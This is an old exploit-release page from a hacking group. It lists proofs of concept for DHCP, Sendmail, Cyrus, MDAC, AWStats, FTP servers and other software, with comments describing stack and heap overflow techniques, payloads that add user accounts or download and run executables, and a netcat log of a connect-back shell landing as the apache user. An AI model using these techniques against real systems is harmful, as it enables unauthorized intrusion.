"Never let school get in the way of learning."
-- Mark Twain

[BL4CK] - Exploits

Publicly available exploits published by blacksec members. 

We are not responsible for your actions, this information has been published with the understanding that the viewer will use it responsibly and only for public security proof of concepts.  Exploiting vulnerable hosts may lead to jail time.

Exploits

MS06-036 Windows DHCP Client - Broadcast Attack



This is our present to BlackHat/Defcon.  If you're attending this year, STAY OFF THE INTRAWEBZ.


** This should not be used in any illicit manner**
** This is a proof of concept, and we cannot be **
** held liable for the misuse or alterations of **
** this code.                                   **

** Note: this proof of concept has only been tested on Windows 2000 sp4   **
**       this exploit will continuously reboot the affected computer,     **
**       indirectly bruteforcing the location of our address on the stack **
**       sometimes its the first try, other times it takes 15 tries, it   **
**       all depends on how your stack is feeling today :)                **

**       this exploit will add a user bl4ck with the password bl4ck       **

MS06-036 - DHCP Client Service
Vulnerability in DHCP Client Service Could Allow Remote Code Execution (914388)
http://www.microsoft.com/technet/security/Bulletin/MS06-036.mspx

The DHCP API has a stack-based overflow in the misuses of additional DHCP options.  By appending a severely long domain name (option 15) we can overwrite the SEH at the end of the stack.  The trick to this exploit is that it converts your ascii buffer to unicode on the stack, ergo you become limited it the options you can choose.

Cyrus Imapd POP3d Exploit


# cyrus-imapd pop3d exploit
# by bannedit
#
# 05/23/2006
#       This exploit takes advantage of a stack based overflow.
#       Once the stack corruption has occured it is possible
#       to overwrite a pointer which is later used for a memcpy
#       this gives us a write anything anywhere condition similar
#       to a format string vulnerability.
#
#       I choose to overwrite the GOT table with my shellcode and
#       return to it. This defeats the VA random patch and possibly
#       other stack protection features.
#
#       tested on gentoo-sources linux 2.6.16

Sendmail 8.13.5 and below Remote Signal Handling Proof of Concept


# redsand@blacksecurity.org
# Sendmail 8.13.5 and below Remote Signal Handling exploit
# usage: rbl4ck-sendmail.py 127.0.0.1 0 25
#
#

# this exploit was leaked to the PHC (Phrack High Council)
# so instead of only letting them have a copy, we figure
# everyone should have what they have.
#
# :-)

#
# several of the tested operating systems appear to crash at a static
# string in memory and we were unable to shift the location of that crash.
# However, Fedora gives us a nice sexy soft spot to land, one that allows us
# to control the flow of code execution
# this is only a proof of concept
#

MS06-014 MDAC Code Execution in Internet Explorer


** This should not be used in any illicit manner**
** This is a proof of concept, and we cannot be **
** held liable for the misuse or alterations of **
** this code.                                   **

** this exploit will download a file hosted on  **
** the same domain and execute it locally on the**
** affected computer system                     **

MS06-014 - RDS DataStore
http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx

This exploit allows us to open up a valid Adodb Stream object and write
the contents of an AJAX request to any location on the affected system.
Furthermore, we are then able to execute our newly written script with the
privileges of the current user.

Our malicious contents from the XMLHTTP Request are written locally to the
Temp location with the CreateOverwrite flag set using the method "savetofile"

Usage: ./bl4ck_ms06_014.py /location/to/stage2.exe index.html
        (the file we want to execute must be hosted on the same site as the malicious html)

VNC 4.1.1 (VNC Null Authentication) Auth Bypass Patch



By redsand@blacksecurity.org
&&
zeroday@blacksecurity.org

http://blacksecurity.org

Greetings: #black, darkeagle, felinemenace and the whole gang at pulltheplug

This patch is for the real vnc source package:
vnc-4_1_1-unixsrc however other clients can be modified.

**Update
A win32 binary version is now available
BL4CK-vncviewer-authbypass.exe
MD5: 5ca3f79b193cf5aa43bfc0733d021a0c 

AWStats 6.x Migrate CMD Injection Connect-Back Exploit


#!/usr/bin/env python
# http://secunia.com/advisories/19969/
# by redsand@blacksecurity.org
# May 5, 2006 - HAPPY CINCO DE MAYO
# HAPPY BIRTHDAY DAD
# private plz

#
# sh0utz: felinemenace, pulltheplug.org, str0ke/milw0rm, and lets not forget #black
#      darkeagle/uKT, 0x557, and the ol' gang on DARPA
#

#
#     redsand@jinxy ~/ $ nc -l -p 31337 -v
#    listening on [any] 31337 ...
#    connect to [65.99.197.147] from blacksecurity.org [65.99.197.147] 53377
#    id
#    uid=81(apache) gid=81(apache) groups=81(apache)
#

FILECOPA V1.01 and Below Pre-Authentication Remote Overflow



### FILECOPA DOS
### www.filecopa.com
### Found Jan 19 2006, Tested again on the new release 6 April 2006
### BY Bigeazer
### http://blacksecurity.org

### They are selling this software for $39.95...
### oh well.. maybe they shoud fix it first?

#
# It appears that FileCopa does not handle alot of new line char
# in the USER login.  This is in the filecpnt.exe file.
#
# This is only a DOS, that kills the ftp process

NASA IND Tree Graph Format String Overflow



This is an example format string overflow for some GLP'd NASA software available.  This is utterly pointless (and we know that) but its fun to ./g0vt

IND: Creation and Manipulation of Decision Trees from Data
A common approach to supervised classification and prediction in artificial intelligence and statistical pattern recognition is the use of decision trees. A tree is "grown" from data using a recursive partitioning algorithm to create a tree which (hopefully) has good prediction of classes on new data. Standard algorithms are 1) that of Breiman, Friedman, Olshen, and Stone; and 2) Id3 and its successor C4 (by Quinlan). As well as reimplementing parts of these algorithms and offering experimental control suites, IND also introduces Bayesian and MML methods and more sophisticated search in growing trees. These produce more accurate class probability estimates that are important in applications like diagnosis.


/*
 * POC for nasa software (eek!)
 * Tree Graph Datamining Algorithm
 * rbl4ck-nasa-IND-Tree.c
 * indulgences by redsand
 * public - cuz this is pointless
 * however i wanted to say i wrote an exploit
 * for US Government software
 * shoutz to darkeagle @ blacksec
 * 03/09/2006
 * redsand@blacksecurity.org
 *
 * software found at: (tgen)
 * http://opensource.arc.nasa.gov/project.jsp?id=7
 */

Golden FTP Server <= 1.92 (APPE) Remote Overflow Exploit (meta) 


##
# Written by Tim Shelton [redsand@redsand.net]
# GoldenFTPd 
##

This advisory is included in CANVAS

creLoaded <= 6.15 Remote Command Exploit


#!/usr/bin/perl
#
# creLoaded <= 6.15 HTMLAREA automated perl exploit
# hacked up by kaneda
#
# Rather simple exploit, but still an exploit nonetheless. Attempts to upload php script and
# utilise that to execute commands, and show off a fake shell.
#
# Can specify:
# User-defined PHP script or one provided in this script (suits most occasions)
# Additional variables to pass to PHP script after upload
# * HTTP proxy
#
# Read the (messy) code before use.
#
# Greets: nemo, mercy, riotact, zeroday, modem, phildo, gimmemylanta, rodjek, negz, #black
#

Sami FTP Server 2.0.1 Remote Buffer Overflow Exploit (meta) 


##
# Written by redsand
#
# This is simple, look for a {call,jmp} esp
##

Windows Media Player 7.1 <= 10 BMP Heap Overflow PoC (MS06-005) 



# sploit creater by redsand@blacksecurity.org
# ms06-005 advisory proof of concept
# heap overflow in wmf.dll @ 0x0035920a
# denial of service, cuz we can't get this to play nice